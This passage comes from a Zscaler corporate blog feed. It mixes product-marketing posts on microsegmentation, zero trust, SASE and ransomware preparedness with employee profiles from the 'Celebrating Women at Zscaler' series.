workloads are dynamic and ephemeral. Policies that aren’t also dynamic and ephemeral slow things down and can cause issues. Finally, this approach can be complicated to manage, often leading to larger segments than originally anticipated, a tradeoff that results in lower operational overhead, but that undermines the very point of doing microsegmentation to begin with. Any attempt to do more granular segmentation (i.e., microsegmentation) leads to a massive increase in the number of firewall rules, which becomes unmanageably complex. Challenges with microsegmentation Despite its effectiveness in reducing the risk and impact of a breach, many microsegmentation projects fail in implementation. There are several key reasons for this, most of which can be traced back to operational complexity and too little automation requiring too much human involvement. Newer microsegmentation products have been designed to overcome these challenges. One of the biggest challenges with microsegmentation is mapping out the appropriate communications paths for each piece of software, which provides the basis for policies. Doing this manually requires detailed knowledge of how every workload communicates with every other workload in your cloud and/or data center environment. This level of knowledge doesn’t even exist in most organizations. Without machine learning driven automation, this can be an incredibly time consuming process, with the findings being outdated by the time the investigation has been completed. Additionally, if not done properly, implementing microsegmentation can break applications. This stumbling block can cause internal pushback on the entire project, and requires a system that accurately and quickly identifies required communications paths, adapting automatically as the dynamic environment changes. Finally, the underlying network changes required to implement microsegmentation policies can be extensive, leading to downtime, costly mistakes, and difficult coordination across several groups in the organization. More recent advances in microsegmentation have been designed as overlays to the network itself, achieving the desired goal but without making any changes to the underlying network. Zscaler Workload Segmentation Zscaler Workload Segmentation (ZWS) was built from the ground up to automate and simplify the process of microsegmentation in any cloud or data center environment. Built on easy-to-understand, identity-based policies, with a single click, you can enhance security by allowing ZWS to reveal risk and apply protection to your workloads—without any changes to the network or applications. ZWS’s software identity-based technology provides gap-free protection with policies that automatically adapt to environmental changes. Eliminating your network attack surface has never been simpler, and you get true zero trust protection. Thu, 01 Apr 2021 08:00:01 -0700 Rich Campagna Celebrating Women at Zscaler: Pooja Deshmukh & Dorothy Meshack In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Pooja Deshmukh is a Principal Product Manager at Zscaler who feels proud of the impact she’s been able to make in her time with the company as it continues to grow. “When I look at my career at Zscaler, it's been an amazing ride,” she said. “I definitely feel proud of the tangible contributions I could make to Zscaler's business, including introducing a new product line, seeing our top deals, raising the top line, and building teams from scratch. It has always been fun to work with some of the most talented minds in the industry.” She said if she could give her younger self any professional advice, it would be to be more assertive to make sure your voice is heard and to get a mentor early on in your career. As far as advice for women wanting to get into technology, she recommends to always continue learning. “I would really like to quote my mentor, "the best way to learn swimming is to just jump in the pool." So just jump right in. Get a start. Ask questions. Be at it. Focus on building the building blocks,” she said. “It may be the basics of algorithms, it may be the basics of mathematics, or Have your basics right and build on it.” “The technology field is a rapidly changing field. You need to embrace the change. Know that you have to keep up with the pace, and never shy away from learning opportunities.” Outside of work, Pooja enjoys staying active and has picked up a new active hobby during quarantine. “I like to really stay active, maybe a simple walk, a jog, or a bicycle ride,” she said. “But I was never into weight training. Quarantine life gave me an opportunity to focus more on isolated activities. So I picked up doing weight training in the last year.” Dorothy Meshack is a Value Creation Analyst located in Bangalore, India. She is proud of never missing an opportunity to learn and recommends that any woman wanting to get into tech should take the plunge. “I'm extremely proud of having the ability to take up challenges and also balance that out with a mindset to learn,” she said. “I think it's extremely important for everyone to have a learning mindset because learning is a continuous process. And the minute we stop learning, we pretty much drag ourselves down.” “The advice that I have for women wanting to get into things into technology is don't think twice. Just go for it,” she said. “We need to have more women in technology, where we do not continue to have gender disparity. We are in 2021. We really need to beat that. And for us to beat that, we need to have more and more women joining technology, more and more women in powerful positions.” Dorothy cites her mother as her greatest inspiration when she was growing up. “Despite being a homemaker and not having hardly any exposure to the corporate world, she's always taught me to make the right choices and to always stand up for myself. She's given me the power to be independent. And that's extremely important.” Outside of work, Dorothy enjoys cooking, spending time with family, and gardening. "I really enjoy cooking and spending a lot of time with my nieces and nephews who are all 3, 4, or 5 years old. And I love gardening. That's actually another hobby that I picked up during quarantine. It gives me such a sense of calm to be out there." Tue, 30 Mar 2021 08:00:01 -0700 Kristi Myllenbeck Are you Consistent, Confident, or Courageous? Diving into the Zero Trust Deep-End. This post also appeared on LinkedIn. The 2020 Gartner Zero Trust Market Guide predicts that in just two years, 80 percent of businesses will access new digital applications using Zero Trust Network Access (ZTNA). The report also declares that ZTNA security solutions will soon supplant legacy security solutions such as virtual private networks (VPN) for remote employees and third-parties. ZTNA and other cloud security solutions are moving to the forefront of IT plans for two reasons: Legacy solutions can’t accommodate enterprise network transformation initiatives. Large, hardware-based security stacks are expensive and can’t scale to meet the added traffic generated by the shift to the cloud. Last January, I would’ve agreed with Gartner’s optimistic ZTNA-adoption assessment. But then the COVID-19 crisis happened. Companies refocused on ensuring business continuity. (In a time of urgency, many look to familiar technology, even if it’s not the best for the situation.) Much of the enterprise reactive scrambling involved expanding existing VPN systems. But as entire companies shifted to company-wide work-from-home (WFH) scenarios, enacting long-term security plans became a tactical exercise rather than a strategic one. After “day one” of the crisis, enterprise business continuity plans (BCP) generally took three different paths: Consistent, Confident, and Courageous. Imagine you are at a public pool with your three children, each standing on a different diving board: one at one meter, one at three meters, and one at six meters. Below, we’ll look at all three in the context of zero trust. Consistent The first child at the lowest height—the one-meter diving board—jumps straight into the water: low risk, low concern. This is the “Consistent” approach. In an enterprise security context, the low-diving-board-metaphor business continuity plan includes scaling up work-from-home with current or expanded VPN capacity. As long as that capacity is accessible, consistent companies can move forward as before with little impact to ongoing operations or productivity. The Consistent approach provides continued and non-interrupted application access without new tools or systems. Longer-term network transformation plans are unaffected, and business continues as before. There isn’t enough (or any) pain to force a change to a zero trust adoption strategy. When it comes to security, however, inherent VPN risks now exponentially increase. Increasing WFH increases the risk to your network. More users on the VPN expands the network attack surface: Perimeter-based security must encircle each and every individual remote network connection. (Consider each remote employee as a new branch office of one.) This extended exposure will continue until circumstances change. And threat actors know this: The recent REvil attack targeted unpatched VPN servers. When it comes to protecting the enterprise “crown jewels,” you can continue to use legacy solutions such as virtual routing and forwarding (VRF), firewalls, or network access control (NAC) to control who accesses what in the network. But recognize that these legacy solutions are expensive to implement and difficult to manage. Alternatively, you can use this opportunity to compare Zero Trust to legacy solutions for VPNs, third-party access, and operational technology (OT) protection, assuming the crisis doesn’t usurp resources and budget in the meantime, of course. Confident The next child climbs to the three-meter diving platform: higher risk, and some marginal concern on your part. This is comparable to the “Confident” enterprise course. Organizationally, the Confident enterprise quickly adjusts to the new crisis-based reality. Extending legacy system capacity in order to get remote workers functional requires intensive (and probably costly) efforts. As a result, enterprise leadership recognizes how legacy network security architectures limit flexibility. The pandemic offers a use case to demonstrate zero trust as a network transformational solution. You can create test groups to demonstrate ZTNA versus VPNs. (For adopting ZTNA solutions, Gartner Research recommends using a pilot group to measure transformation solutions against legacy networks.) Enterprise transformation usually involves numerous stakeholders. This means enterprises must address many architectural risks and concerns. While the current pandemic probably speeds up the adoption process, keeping a zero trust solution depends on seeing immediate benefits from the technology. It also highlights other (perhaps contractual or financial) obligations associated with your legacy architecture. Now is the time to promote any solid data showing zero trust benefits over legacy solutions. This will pique the interest of other teams and business units in the enterprise. Look for support from zero trust providers, trusted advisors, and internal champions. Courageous The third child races up to the six-meter diving board: high risk, high concern. The six-meter diving board may be impressive, but it also triggers insecurity and fear. This is the “Courageous” option. The Courageous enterprise, rather than sticking with legacy architectures or adopting transformation as needed, jumpstarts its transformation strategy immediately. There is risk in this approach. Executing a new transformational strategy while dealing with the pandemic can pose challenges to resources, costs, and responsiveness. Replacing legacy VPN systems with a zero trust solution is an excellent first step. The IT team must identify what applications users are accessing, and where those applications reside (in an internal data center, or in a cloud environment). The sheer number of applications may surprise IT admins, given the proliferation of shadow IT (and often, the lack of visibility into user data traffic). IT must determine how to apply policies so that users can access internal and external applications and services. A comprehensive data-traffic audit/application inventory will provide good visibility into both enterprise network traffic and user network behavior. Setting policies in a zero trust architecture—at least in the beginning—can seem like a daunting task. It’s why many organizations choose to jump into the transformation pool from a lower diving board. They fear that policies will hinder employee productivity (too restrictive) or expand the network attack surface (too permissive). But with the risks comes greater rewards: Courageous organizations gain the immediate value of a zero trust solution—better security and better performance—and create an agile connectivity environment able to accommodate change. Zero trust supports the type of network transformation that gives enterprises competitive advantages and better customer experiences. (And those impacts will matter when we come out on the other side of the current crisis.) Diving in with zero trust solutions The three pandemic responses are like our three divers: they can all achieve a clean and safe dive into the transformation pool without mishap. Ensuring business continuity during the current pandemic requires a Herculean effort no matter which path a company chooses. The difference is in how the company’s transformation strategy positions its ability to achieve enterprise goals when the crisis is over. “Consistent” organizations will ultimately carry on as before, but will remain a step behind competitors when it comes to transformation. “Confident” enterprises will have significant data at their disposal to use in moving their strategy plans forward. And “Courageous” enterprises will find themselves ahead of the game when transformation’s benefits further their business goals. There are many discussions asking what will happen after the pandemic. Will we return to “normal”? Will the pandemic accelerate transformation strategies? My take is that WFH policies and practices will become a more robust part of daily enterprise culture, a go-to strategy as part of BCP, and an entry point for network transformation. There is an enterprise need for flexible and scalable secure application access—in the immediate crisis and beyond. And that makes now a perfect time to begin network transformation. Oh, and go for the high dive. You’ll cause the biggest splash. Tue, 30 Mar 2021 08:00:01 -0700 Kevin Schwarz Celebrating Women at Zscaler: Pratibha Nayak, the First Female Zscaler Employee, on Shaping Zscaler and Staying Curious In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Pratibha Nayak joined Zscaler in 2007 and was the first female employee at the company. Located in Bangalore, India, Pratibha currently serves as a Senior Principal Engineer for the UI team that manages APIs for Zscaler Internet Access (ZIA). “The best aspect of my role at Zscaler is that I get to design and come up with software solutions that can leverage our core complex product underneath and deliver it to the customer as a sleek, user-friendly interface that meets their requirements,” she said. Q: What are you most proud of in your career? A: Joining a startup at a very early stage has given me an edge in understanding the very core fundamentals required for building a world-class product from the ground up. Looking back now, after more than a decade, I feel very proud of the gut decision I made to join Zscaler at a point in time when the startup culture in India was less experimented and sought after. Q: What advice do you have for women wanting to get into tech? A: Today, there is never a dearth of opportunity to learn and succeed in the emerging tech industry. It’s a matter of being passionately curious about what interests you. In short, just take the plunge. Q: What do you like to do outside of work? A: I like to spend time being outdoors and in nature. Even taking a stroll just to catch a sunrise or sunset across the horizon brightens up my day. I also enjoy playtime with my two young kids, especially when they include me in their role-play activities to play Madame Gazelle from Peppa Pig when they are short of participants! For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Dianhuan Lin and Wendy Case Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Thu, 25 Mar 2021 15:00:02 -0700 Kristi Myllenbeck Year One, A.C. (“After COVID”): What’s Next for Cyber Professionals in the New World? I used to work in an office. Now—like most enterprise IT professionals—I work from the kitchen. Or my guest room. Or the patio. Or a socially-distanced “anywhere” with good Wi-Fi. COVID-19 has forced us all to change how we look at, design for, and enable remote access to applications, data, and information resources for our employees. And just as we’re getting used to this telecommute-only phase, we’re about to enter a new age: the After-COVID (AC) era. In the AC era, crises and disruption will happen. As we’ve seen in the last few months, the COVID-19 crisis changed business processes overnight—and caught most companies completely off guard. Their legacy infrastructures couldn’t accommodate the needed changes (in this case, everybody suddenly working outside the office). The AC era means a new flexible working environment: we’re either working from home, gone back to work, or maintaining a hybrid of the two. Corporate environments must be agile enough to respond to future crises: they will happen, and your business must adapt to meet the challenges. The AC era means accepting the disruption of “business as usual.” Beyond enabling business continuity in the face of massive change (such as COVID-19), enterprise IT leaders must look at the new technologies, infrastructures, and services offered by disruptive companies. Large enterprises can no longer sustain inflexible systems that neither pivot nor scale. The new AC world will move too fast for legacy systems to keep up. Let’s not do this again... In my dealings with CISOs and CIOs, I’m hearing two messages loud and clear: Businesses can’t afford to be surprised by another crisis. Something like COVID-19 will happen again, and we’ll have to pivot again. Preserving inflexible networks and moribund cybersecurity technology will restrict future agility. People will access and consume applications and data from anywhere and everywhere. The internet is everything, to everyone, all the time. Applications and data will live outside the corporate network. And employees will too. Accommodating this shift means we need to change how we architect our environments both from a business and a security perspective to support and embrace this new outside-the-perimeter way of work. The struggle to move from legacy hub-and-spoke architectures marked the Before-COVID (BC) enterprise era. Even BC, IT leaders recognized the extent to which a perimeter-based corporate network model was overly-complex, inflexible, easily overwhelmed, and unable to scale to meet application and security transformation demands. The more entrenched these architectures were in enterprises, the less likely enterprises could pivot quickly to match needed changes brought on by a global pandemic (like, say, the need to shift to a 100 percent remote workforce overnight). The COVID-19 crisis exposed the extent to which legacy systems hinder enterprise ability to enable remote access. Couple that with employees spending most of their time outside the corporate network perimeter, and it is clear this new way of work requires a new security approach that can only be brought about by transformational change in how we manage and mitigate risk. We CISOs and CIOs must plan to support the new AC era immediately (and indefinitely). We need to examine architectures, tools, processes, and technologies and ensure they align with the new reality of remote employees, third parties, and customers that expect to work from anywhere. There will be more crises. The sooner we accelerate digital transformation, the better prepared we’ll be for the next agile pivot. The whole idea behind transformation is for companies to move quickly to embrace change. Beyond unforeseen crises, companies must absorb the latest technologies: 5G, new collaboration tools, more-powerful endpoint computing, and mobile devices. Network and security infrastructure must be flexible enough to support their adoption. There’s a huge opportunity here to move IT from reactive mode to proactive mode: Your IT teams should not just be in the business of responding to executive mandates. They should seize the moment to create infrastructure and workflows nimble enough to pivot to, enact, and enable new business strategies. This is where I have focused many of my discussions with security teams. Security professionals, at times, can be too focused on risk avoidance when contemplating transformational change. This involves a level of risk-taking, which is fundamental to business. Without it, no business value would ever be generated. Year one AC forecast: Cloudy with a chance of productivity The way of work has changed forever: Employees connect from anywhere and work in the cloud. But legacy perimeter-based security models can’t protect them or their work. And the COVID-19 pandemic has laid bare legacy infrastructure’s remote-access shortcomings. In the AC era, IT leaders will face a choice: Will they preserve legacy infrastructure, force employees to use VPNs, and pretend everything’s okay? Or employ connectivity and security solutions designed to support the way their enterprise colleagues work? Hint: It’s the second option, and it’s already in motion. Enterprises have been moving applications, data, and infrastructure to the cloud for years now to make networks more responsive to business needs. Users have also been slowly migrating outside the network perimeter—COVID-19 just accelerated this process by an order of magnitude. Securely connecting users to applications, data, and infrastructure directly via the internet has gained traction using a new networking model known as Secure Access Service Edge (SASE). SASE is a network design concept that uses the internet as the access transport for applications and data, no matter where those assets sit—in the cloud or legacy data centers. SASE is truly precognitive: It is a perfect solution for crises like COVID-19. In fact, these last months have been a world-wide proof-of-concept for the SASE model. The implementation of this edge-based network provides security and access based on user and application connection rather than hub-and-spoke networks with castle-and-moat security. Last year, Gartner defined the SASE model in a paper that outlined the requirements and implementation of an edge-based network. SASE has become a bit of a marketing buzzword. (Indeed, some companies claim SASE-compliance, even though their solutions don’t meet its guidelines.) An ideal SASE solution should satisfy six functional criteria: Seamless direct access to both external (Internet, SaaS) and internal (data center, IaaS, PaaS) applications Context-aware access that correlates user, device, application, and other characteristics in order to grant permission and provide granular visibility Flexible deployment across all users and locations, for instant and seamless expansion without complex on-premises hardware deployment or licensing delays Excellent user experience when accessing critical corporate applications and key collaboration tools such as Zoom or Microsoft Teams Comprehensive visibility for security, monitoring, and troubleshooting provides excellent insight into traffic patterns and enables rapid user-issue resolution Comprehensive security and compliance tools that mitigate cyber threats and protect applications and data Your employees need to be able to use the right tools and technology to drive enterprise growth. The objective is to establish direct, secure, and scalable access to applications and data. For CISOs and CIOs, this approach moves the triumvirate of goals they have to bring value to the business: attestable bend in the curve of risk, lower total cost of controls and enablement of business velocity and user experience. SASE prepares you for the AC era Change won’t be easy: Successful enterprises in the new AC era will be built on agile network and security architectures. Though the world of legacy networks may already have been heading in a SASE direction, the COVID-19 crisis has blown up legacy models for good. Enabling the new work-from-anywhere workforce has necessitated a fundamental change in how we approach connectivity design and cloud usage. The cloud is the new corporate data center, and the internet is the new corporate network. Embracing that reality will future-proof your enterprise, and better serve your business, your bottom line, and your users. Welcome to year one, AC. Thu, 25 Mar 2021 09:53:15 -0700 Brad Moldenhauer Zero Trust: The Key to Securing Business Now and in the Post-COVID World Foreword: First, to the IT security leaders who spent countless hours responding to the need to secure a new, remote workforce during the pandemic - congratulations for what I’m sure, for many of you, was one of the most challenging and significant accomplishments of your career. When Zscaler first began to hear from companies about the need to enable a mobile workforce, we anticipated two things would happen. First, many organizations would look for a quick, short-term solution to the problem and scale up their use of remote access VPN. In fact, this can be seen from the data below provided by Wipro’s State of Cybersecurity Report 2020. See how more than 90 percent of organizations view increased VPN capacity as a top priority: Second, we anticipated that quickly adapting to a remote workforce would lead to what would be the largest attack surface in the history of security. As the use of VPN technology adoption skyrocketed, so too did the number of internet-based exploits looking to capitalize on the fact that they are used to connect users to the corporate network. In fact, there are now almost 500 known vulnerabilities on the CVE database actively targeting VPN. Some examples of VPN-based exploits include: Social Engineering Attacks – as we saw at Twitter in 2020 Microsoft Exchange Server Exploits Ransomware – for example, Sodinokibi, which affected several large businesses Attacks on the U.S. government from Nation-States (i.e., China) Each of these exploits poses a considerable threat to a business. To combat them, companies are now looking to embrace zero trust architectures as a means of connecting users to business applications, therefore eliminating the need for VPN and avoiding placing users onto the corporate network or exposing resources to the internet. The companies that had already begun their zero trust journey benefited greatly, as they already had the foundation technologies in place to protect their data, ensure least-privilege access, and deliver the experience their users needed when it mattered most. They simply scaled up their zero trust services. A new cloud landscape makes zero trust critical Business continuity in 2020 taught us that location no longer matters when it comes to the productivity of employees, and that the rise of a new, hybrid workforce has accelerated transformation to cloud services that can better enable business growth and competitiveness. This has opened up new avenues for cloud-delivered security technologies that were designed to connect users, who are now working from anywhere, to critical business applications. This is why the adoption of zero trust architectures has grown by leaps and bounds, and is expected to continue, due to the fact that more than 80 percent of IT leaders say it’s a priority post-pandemic, per Wipro’s research. As security leaders look to embrace these architectures, they need to first understand what zero trust means and be sure to avoid the misconceptions that often surround the topic. They should note that the term “zero trust” has been around for more than 10 years. The problem was that it was always based on the notion of network connectivity—connect a user to a network where the applications lie and then segment the network with internal firewalls to minimize lateral movement. This was complex to manage and implied trust of users by allowing remote users to VPN onto the network via tunnel, and in-office employees to access the network simply because they were already working from HQ or a branch office. This is the opposite of zero trust. Zero trust is about beginning with the notion of trusting no one, and only establishing trust by first relying on context - the identity of the user, and the business policies defined by IT - to provide access to specific apps, never the network itself. As the user leaves the company or the health of the user device they are connecting from changes, the business policies then adapt to minimize risk to the business. These capabilities are key to enabling the success of the business now and in the future. It’s also important to realize that not all zero trust services are the same. Some are hosted as fully cloud-delivered services that are managed by the security vendor. Others are deployed as on-premises gateways hosted and managed by the customer themselves. Architecture matters more than ever. Powering business with zero trust The good news is that with zero trust, security leaders now have the rare ability to actually drive the secure transformation of their business, rather than get swept up in the change. Here is what I mean by that: Organizations must move to the cloud for agility and remove IT friction - The adoption of SaaS apps (O365, Salesforce, Box, etc.), collaboration apps (i.e., Microsoft Teams and Zoom), and the move to public cloud (Azure, AWS, Google, etc.) are all natural tailwinds for transformation. It also explains why more than 80 percent of businesses expect to increase the consumption of security-as-service technologies post-COVID-19. Cloud-delivered zero trust services will become the preferred option for businesses going forward since they offload the management of security infrastructure to the vendor and ensure scalability and availability as part of their service level agreement (some even have a five nines SLA). These services were designed to connect users to the applications they need using brokers with points of presence all across the globe - even if the app is running on-premises or on a public cloud platform. There are also no appliances to manage or network infrastructure to set up that would slow down the move to cloud. Businesses must ensure that access to apps is rooted in zero trust - The ability to use identity and defined business policies to connect authorized users directly to applications ensures that the business never has to place users onto its network. This means that no network resources ever need to be exposed to the internet. It also means that access to applications is always secure. This makes it easier for the business to embrace cloud, and, when combined with the ability to use device posture as a criterion for access to an application, the 70+ percent of businesses who view device security as a priority going forward, will be overjoyed. Users must have the ability to work from anywhere - Because zero trust access is always based on identity and business policies, and the cloud service automatically selects the fastest access path, the physical location of the user no longer matters. The same user working in the office has the same exact access experience when working from home. This is good news for the IT security teams using zero trust services today, as the same technologies they have invested in in the remote world can still be used once offices begin opening back up. Shifting zero trust from theory into practice Knowing where to begin is always the hardest part of embracing something new. Below are some tips to consider when it comes to your zero trust implementation: Build your zero trust blueprint - Make sure to include an identity provider, access service, endpoint security solution, and SIEM solution in your plans. There is no “god” zero trust solution. Each of these are key ecosystem players that are designed to integrate with each other using APIs. Determine what your existing attack surface looks like today - ask the zero trust vendor you are considering to run a free assessment to determine if your network environment is currently exposed to the internet. Discover any Shadow IT applications running in your environment - there is a good chance that there are SaaS apps or private apps being used today that you are unaware of. Make sure your security vendor has the ability to help you discover each type. Choose an initial set of users - Select a set of employees or third-party users that will benefit most from this zero trust plan. These could be C-levels who are often important for any key decisions around IT, or partners who need access to your business applications (they often present the greatest user risk to your business) Choose an initial set of applications - Focus on the business applications that currently present the greatest risk to your organization. For many, it’s their crown jewel private applications. Download your copy of Wipro’s State of Cybersecurity Report now. Are you Ready to Seize the Zero Trust Moment? Join us to learn how the latest Zscaler innovations will enable you to accelerate business transformation by embracing zero trust. Learn more about the event: Thu, 25 Mar 2021 12:00:01 -0700 Christopher Hines Celebrating Women at Zscaler: Dianhuan Lin and Wendy Case In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Dianhuan Lin is a Principal Data Scientist and has been with Zscaler for two years. She prides herself on never shying away from a challenge and fully embracing opportunity when it presents itself. “In my career, I am most proud of being able to follow my passion and choose among opportunities, instead of having the opportunity choose me,” she said. “As far as advice I have for women wanting to get into tech, I’ve found that there is always this negative voice that says, ‘this is too challenging’ or ‘this difficult for women.’ And I always turn those negative thoughts into positive ones, translating it into, ‘that's exactly for me.’” Dianhuan believes big dreams can be achieved through small efforts when you put in the necessary work. “As Jay, the CEO of Zscaler, said, ‘it doesn’t matter whether you are a woman or a man—dream big. It is important.’ Once we take that first step or dream big, we must then work backward in terms of what we need to do, take little steps, make those marginal gains. And one day, you'll be surprised how far you have come.” Outside of work, Dianhuan enjoys hiking and painting, and during quarantine, she has picked up other creative endeavors. “I started learning how to play piano during quarantine with an online tutorial,” she said. “Although I'm not good at music, I try to get out of my comfort zone, and right now, playing music is my favorite.” Wendy Case is Director, Regional Sales for the Midwest Major Team at Zscaler and has been with the company for more than three and a half years. A true tech veteran, Wendy has been in the industry for more than 20 years, and didn’t initially know if it would be the right path. “I took a chance on technology years ago after graduating from the University of Iowa with a degree in finance and a minor in accounting and Spanish,” she said. “I'm so glad I did because tech has great opportunity. I gave it a chance and thought, if it didn't work out, I could always get out of it. But look where I am now, twenty-something years later, still here, still in technology.” Reflecting on the International Women’s Day theme for 2021, Wendy said that she wants to normalize the technology field as a viable option for all women, even if they don’t have a technological background. “I definitely encourage young women to get into technology. When I think about the International Women’s Day theme, ‘Choose to Challenge,’ I am passionate about challenging my own daughters, as well as their friends, to think about technology as an option,” she said. “There are so many opportunities and so many things that women can take advantage of in a technology company. I think it's an underserved market and we need to keep getting the word out about that.” She also stressed the importance of advocating for yourself, staying hyper-focused on your goals, and chasing your dreams. “If I had one piece of advice to give myself from years past, it would definitely be to lean in. I wouldn't have known what that term meant 20 years ago, but I definitely know opportunities passed me by because I didn't lean in,” she said. “I didn't voice my opinion. I didn't let leadership know what I was interested in pursuing. So I'd highly encourage my younger self to do that. And I encourage all the women at Zscaler to do that—make sure that you are heard. Make sure that people know what you want to do, and they can help make your dreams come true.” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Thu, 25 Mar 2021 00:00:03 -0700 Kristi Myllenbeck Eighty-Seven Percent of Your Network Paths are Only Used by Attackers The first phase of deploying microsegmentation on a corporate network involves taking full inventory of your environment, mapping workload communication paths, and then analyzing that data to determine what needs to be allowed and which paths should be eliminated. This is typically a complicated, time-consuming process for security teams. (On the other hand, if you’ve used Zscaler Workload Segmentation, it’s all automated.) Regardless, at some point, you arrive at conclusions around how to build segments, hopefully with small segments of no more than five to 10 machines. What you find may surprise you; for customers that have used Zscaler to segment application workloads and identify and eliminate the attack surface, the findings have been striking: Up to 87% of allowed network paths in large segments (read: those that are not microsegmented) are completely unused for legitimate traffic. So who uses these paths? Attackers, to move laterally, whether it’s your on-premises network, cloud environments, or hybrid cloud. In attack after attack, bad actors find an initial weakness to exploit that gets them access to an organization’s network. Once they’re in, they move laterally (east-west) across the network to look for valuable data or to wreak havoc with exploits such as ransomware. Regardless of the attacker’s end game, they rely on flat networks with overly permissive policies to inflict maximum damage. Microsegmentation greatly restricts lateral movement, reducing the blast radius if (when?) an attacker gains a foothold into your network. In an ideal scenario, you’re getting rid of those 87 percent of allowed, but not used, network paths. Microsegmentation should be a foundational network security control in any well-architected data center or cloud protection strategy. So why don’t more organizations deploy microsegmentation? Because it’s difficult. Microsegmentation is often viewed as complex, costly, and difficult to deploy, typically involving an eight-to-twelve-month process (at best) that results in policies that are already out of date by the time they are rolled out. But it doesn’t need to be this difficult. Zscaler Workload Segmentation has been engineered to eliminate the challenges of traditional approaches to network segmentation with simple, software-defined policies: Simplify — Identity-based policies not only ensure that only verified software is communicating, but they get you out of the business of building static network policies based on port/protocol and IP in favor of business-level policies understandable by humans. Accelerate — ZWS automatically builds real-time application topology and dependency maps down to the sub-process level. It instantly highlights required application paths, making recommendations on what can safely be eliminated. Automate — Machine learning automates the entire policy lifecycle, automatically recommending policies, adapting, and making new recommendations when apps change or are added. So, if attackers are able to find their way inside your perimeter, they’ll have 87 percent fewer ways to move laterally. Furthermore, the remaining 13 percent of paths are protected by Zscaler Workload Segmentation, stopping east-west traffic movement. A reduced attack surface means reduced risk. Done properly, microsegmentation can result in the highest ROI that your company can achieve in cybersecurity. Tue, 23 Mar 2021 13:00:09 -0700 Rich Campagna Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Ashley Albiani currently serves as Senior Commercial Counsel for the Legal team at Zscaler. She joined the company in November 2016, and in that time, she has not only grown in her own career, but also mentored and advised interns that have gone on to have successful careers of their own. “I’ve watched legal interns go on to work other coveted internships, pass the bar exam, and/or accept impressive full-time positions as young attorneys,” she said. “It’s rewarding to think that their success is at least, in small part, due to the mentorship and positive experience they had while working with me and the rest of the Legal team at Zscaler. I am genuinely excited to see where each of their careers takes them next.” Q: What advice do you have for women wanting to get into tech? A: ‘Cross-train’ – Search for opportunities to learn a new skill. Offer to take on a project that doesn’t fit within anyone’s current role or look to where you can add value to other internal teams. This will not only make you a more valuable employee, but keep work from becoming dull and demonstrate that you’re motivated to excel, even outside of your comfort zone. Q: What professional advice would you give your younger self? A: Do some research before attending a conference, webinar, or other professional development event and come prepared with a few questions related to the topics. This will make it easier for you to follow along with the presentations and help you get the most value out of the event. Also, I’d tell my younger self to invest more in $ZS! Q: Based on this year’s IWD theme, “Choose to Challenge,” how will you plan to celebrate women’s achievements and forge a path for future rockstar women in tech? A: I plan to actively look for areas where there is gender inequality and encourage others not only to recognize those gaps, but discuss them. Q: If you could have lunch with anyone in history (or present-day), who would it be? A: Ruth Bader Ginsburg - The amount that she accomplished for women’s rights, among so many other things, is incredible, and I’d love to hear every detail of her life story firsthand. She also had a great sense of humor and I’d like to think, along with most women in the legal world, that we’d be best friends. Q: Is there anything you’d like to add about your career journey or women in tech? A: I’d encourage everyone to check in on themselves professionally at least once a quarter. Ask: ‘Am I enjoying this work? What could make my work-life better? What progress have I made toward my goals?’ This isn’t anything original, but an important reminder that you need to carve out time to think about the bigger picture in order to grow and stay happy. Outside of work, Ashley loves to snowboard, surf, hike, play board games, and go wine tasting. During quarantine, she re-watched Jurassic Park and read the book, while also picking up a couple of other rewarding hobbies. “Since quarantine, I’ve been moonlighting as a Chair Yoga instructor for my grandparents,” she said. “I’ve also been practicing the piano again. I gave it up when I was younger, so my mom is now thrilled that those lessons did not go to waste!” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Tue, 23 Mar 2021 08:00:01 -0700 Kristi Myllenbeck Why “Preparing for Ransomware” Shouldn’t Assume its Inevitability This post also appeared on LinkedIn. In a 1991 Saturday Night Live sketch, host Joe Mantegna portrayed a New York City official tasked with reducing violent crime. He offered brochures titled "So, You've Been Shot," "So, You've Been Stabbed," and "So, You've Been Doused with Gasoline and Set on Fire." The satiric message: Being the victim of crime is inevitable, but "that's the price you pay for living in the most vibrant, exciting city in the world." There is a school of thought in IT circles that ransomware victimization isn't just a risk, but an inevitability, and the best thing a CIO/CISO/CTO/CEO can do is prepare for recovery. At best, that’s a fatalistically-misguided assumption that reinforces enterprise commitment to flawed perimeter-based security models. At worst, it’s a cynical acceptance of defeat that invites adversarial attack: “Ransomware is coming, but that’s the price you pay for sticking with 'the way we’ve always done things.'” Preparing for ransom isn’t the same thing as preparing for ransomware. Last year, the WSJ Cybersecurity group sponsored a webinar that emphasized the ransomware-inevitability message. The session’s participants, several of whom were ransomware victims, discussed how enterprises should react to attacks. They spent little time advising how enterprises could proactively prevent ransomware attacks in the first place. One panelist recommended CIOs develop negotiation skills, and invest in Bitcoin to make ransom payoffs easier. Another speaker told of negotiating with a "friendly" hacker, a "family man" whom the moderator suggested was a "gentleman thief." (I half-expected to see a slide titled, "So, You've Been Hacked.") I can’t believe I have to say this, but 